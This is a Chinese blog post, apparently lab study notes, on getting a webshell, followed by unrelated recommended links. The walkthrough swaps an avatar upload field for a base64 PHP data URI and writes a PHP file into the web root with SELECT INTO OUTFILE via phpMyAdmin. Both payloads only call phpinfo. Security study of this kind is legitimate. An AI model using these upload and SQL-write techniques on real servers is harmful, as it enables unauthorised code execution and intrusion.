.sql文件_某教程学习笔记(一):19、任意文件上传和sql语句拿shell

最新推荐文章于 2024-05-19 08:18:45 发布
最新推荐文章于 2024-05-19 08:18:45 发布
阅读量158 收藏
点赞数
文章标签: .sql文件 dio 上传文件报错

毕业时,门卫大爷收走了那辆自行车,问我都那么破了,还拍照干什么,他哪里知道后座上曾坐过陪了我四年的姑娘。。。

---- 网易云热评

一、任意上传文件拿shell

1、注册账号

56a2a1a239b1189d9429b2ef927d4347.png

2、上传头像

7e770d934b6f5e0971bec6c98750c72d.png

3、上传任意文件,抓包分析

f0c25c3a9ac5dca801e3ea9bde6b0a24.png

05a698dbc42020762a3abc6a8ab689dc.png

将tx后面的内容修改为tx=data%3Aimage%2Fphp%3Bbase64%2CPD9waHANCiBwaHBpbmZvKCk7IA0KPz4%3D

解密收的内容为:data:image/php;base64,<?php phpinfo();?>,也就是上传一个文件内容为<?php phpinfo();?>的php文件

4、虽然提示报错,但是我们访问上传后的地址: http://192.168.171.128/uploadfile/member/3/0x0.php ,文件已生效

359e3c77aedbd94bfae2679a5e842fbd.png

98d7e98646d7a442440322c657266dcb.png

二、sql命令拿shell

1、进入phpmyadmin页面

a7a69c784a4a3e3daf866b78432af09b.png

2、输入一下sql语句并执行,生成一aiyou.php文件,内容为<?php phpinfo();?>

select "<?php phpinfo();?>" into outfile "C:/phpStudy/PHPTutorial/WWW/aiyou.php"

78db6beb6a058a2e7ab9b69e233eea92.png

3、访问该文件 http://192.168.171.128/aiyou.php

20353e37d657c0fcead57f3aaa53a8c3.png

禁止非法,后果自负

欢迎关注公众号:web安全工具库

weixin_39688856
关注
上传文件大全sql语句将 上传是时间作为上传文件的名字
03-07
上传文件大全sql语句 将上传是时间作为上传文件的名字将上传是时间作为上传文件的名字
sftp shell 批量上传文件_如何在shell脚本里使用sftp批量传送文件
weixin_39664010的博客
12-21 477
主要步骤如下:1.为运行shell脚本的本地用户生成密钥对2.将其中的公钥分发到sftp欲登录的远程服务器上3.编写并以上面的本地用户运行shell脚本一.生成密钥对在shell脚本中使用sftp时必须用到密钥对(公钥和私钥).可使用下列方式生成(SSH 2.X版本),这里本地用户记为:local_user:$ ssh-keygen -dsa屏幕提示:Generating public/priva...
.net fileupload批量上传可删除_shell脚本进行sftp、ftp文件批量上传与下载
weixin_39951419的博客
11-24 473
SFTP传送:若使用SecureCRT,按下ALT+P开启新的会话即进行sftp操作输入help命令,显示该SFTP提供所有的命令cd 路径 更改远程目录到“路径”lcd 路径 更改本地目录到“路径”exit 退出 sftphelp ...
谷歌CEF3完整包cef_binary_3.2623.1401.gb90a3be_windowsx32x64,支持MP3,MP4,FLASH
10-22
谷歌CEF3,cef_binary_3.2623.1401.gb90a3be_windowsx32x64,支持MP3,MP4,FLASH
如何上传SQL数据库文件
XUEXIBOKE的专栏
11-16 2132
如何上传SQL数据库文件  1.取得远程服务器的IP和登录用户名、密码;2.在本地安装好sql server服务器;3.将下载的mdf和ldf附加为数据库,在本地打开验证是否正确;4.导出数据库,源选择本地,目的选择远程服务器(需要输入IP,帐号,密码);5.下一步,选
SFTP 批量上传下载
CFZero的专栏
11-23 1336
put -r ./dir/ put
通过SQL SERVER远程上传文件的实现[原创]
weixin_30838873的博客
05-22 305
我记得有一种黑客工具,在得到对方SQL SERVER服务器的SA帐号和密码后竟可以通过它上传文件到对方 服务器上面,并远程执行DOS命令。当时觉得很好奇,当然作为程序员的我觉得很不爽, 赶快对SQL SERVER进行了一番研究,并整理出了这篇文章,希望对一些程序新手会有帮助。 写过数据库程序的朋友应该知道,我们可以往数据库中存取各种类型的资料数据 比如文本,整型,二进制等数据。 ...
sftp批量上传及批量下载等最全功能的工具类SFTPUtils
阿啄debugIT
02-26 1549
sftp批量上传及批量下载等最全功能的工具类 import com.jcraft.jsch.Channel; import com.jcraft.jsch.ChannelSftp; import com.jcraft.jsch.ChannelSftp.LsEntry; import com.jcraft.jsch.JSch; import com.jcraft.jsch.JSchExcepti...
打通scp信任通道
fanzhenhua的专栏
01-09 2241
信任通道权限不能太大,对另一方/home和公钥都有权限要求。公钥要求为644,或600,如果权限设的过大。会导致不成功如何在shell脚本里使用sftp批量传送文件文章出处:DIY部落(http://www.diybl.com/course/6_system/linux/Linuxjs/20081216/153898.html)如何在shell脚本里使用sftp批量传送文件主要步骤
sftp shell 批量上传文件_Linux中rz命令使用实例分享(批量上传文件、简单易用)
weixin_32561279的博客
01-16 721
rz命令可以批量上传文件,当然也可上传单个文件啦。使用的协议是古老的ZMODEM协议,虽然协议古老,但毫不影响的简单易用的特性。一般情 况我们要上传文件到Linux系统,要么使用ftp(还得架设ftp服务端),要么使用sftp,上传一个文件要敲不少命令。而这里介绍的rz命令,只需 要简单的在命令行上敲一下 rz -be 命令,在SecureCRT下就会弹出文件选择框让你选择需要上传的文件了,而且可...
JAVA SFTP文件上传、下载及批量下载实例
08-31
本篇文章主要介绍了JAVA SFTP文件上传、下载及批量下载实例,具有一定的参考价值,感兴趣的小伙伴们可以参考一下。
CEF4Delphi使用的CEF3二进制文件32位
05-29
CEF4Delphi 是Salvador Díaz Fau创建的一个开源项目,用于在基于Delphi或LaZARUS/FPC的应用程序中嵌入基于Chromium的浏览器。 CEF4Delphi使用的CEF3二进制文件
sftp上传下载,批量
qq_30373193的博客
05-24 342
摘自 http://www.cnblogs.com/cbread/p/6202069.html 【从nuget中下载SSH.NET】 【具体实现类】 /// /// SFTP操作类 /// public class SFTPHelper { #region 字段或属性 private SftpClient sftp; /// /// SFTP连接状态 /// public bool Connected { get { return sftp.IsConnected; } } #endregion
CEF BINARY下载及编译
最新发布
不定期更新的博客
05-19 458
最近在工作中经常遇到使用CEF的相关场景,所以想学习下CEF的使用,以及自己弄一下Qt怎样接入CEF。首先先搞掂编译。
shell调用sftp实现自动批量上传or下载
京东放养的爬虫
04-29 7314
最近项目需要自动FTP批量上传文件或下载文件。最快的完成方式就是在shell里调用相关的命点击打开链接令,并用crontab调用shell脚本实现周期性FTP批理处理。 当前流行的FTP分为 ftp vs sftp,关于这二者的的样例各举一个。     注意:在编写shell脚本时需要特别注意脚本格式是windows or unix,因为换行符会引出一些莫名的错误。 cd /
FTP和SFTP自动批量传输文件(转)
03-03 502
一、Windows下用ftp自动传送文件的方法 1、先建立一个文本文件文件名可以是任意名,例如ftp.txt,其内容如下: open 192.168.1.100 /*远服务器地址或名*/ MYNAME /*用户名M...
java sftp 多文件上传下载
Sharon_Yaoa的博客
04-06 1305
优化sftp单文件上传下载,实现文件夹中内容的遍历上传下载
编译 CEF3 chromium 2623 /mp3/mp4 稳定、终结版 2018-08
ijiabao的博客
08-20 6544
编译 CEF3 chromium 2623 /mp3/mp4 稳定、终结版 2018-08 前言 以前编译过多次CEF2623,很久了,老代码不慎丢失,需要重新编译。翻看之前的编译记录,以及其它推荐文章,发现还有诸多细节问题,有不稳定的隐患。 本次强调稳定编译,处理了在编译过程中,容易忽略的问题,尽可能的去除潜在的不稳定隐患,特别是Patch补丁与WinSDK版本问题,以及VS版本兼容/...
vs2019编译libcef
Mingyueruya的专栏
12-28 1136
vs2019编译libcef 1.材料准备 libcef官网地址:https://bitbucket.org/chromiumembedded/cef/src/master/ libcef二进制下载地址:https://cef-builds.spotifycdn.com/index.html#windows32 版本:cef_binary_96.0.16+g89c902b+chromium-96.0.4664.55_windows32 cmake vs enterprise 2019 我原本以为我的
Oracle教程Shell脚本实现批量替换文件内容与SQL基础
`Conn`命令用于连接数据库,`Disconnect`用于断开连接,`Save`将SQL语句保存到文件,`Ed`用于编辑这些语句,`@`执行保存的SQL文件,`Desc`命令描述表结构,`Select * from tab`显示所有对象,`Show user`显示当前...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值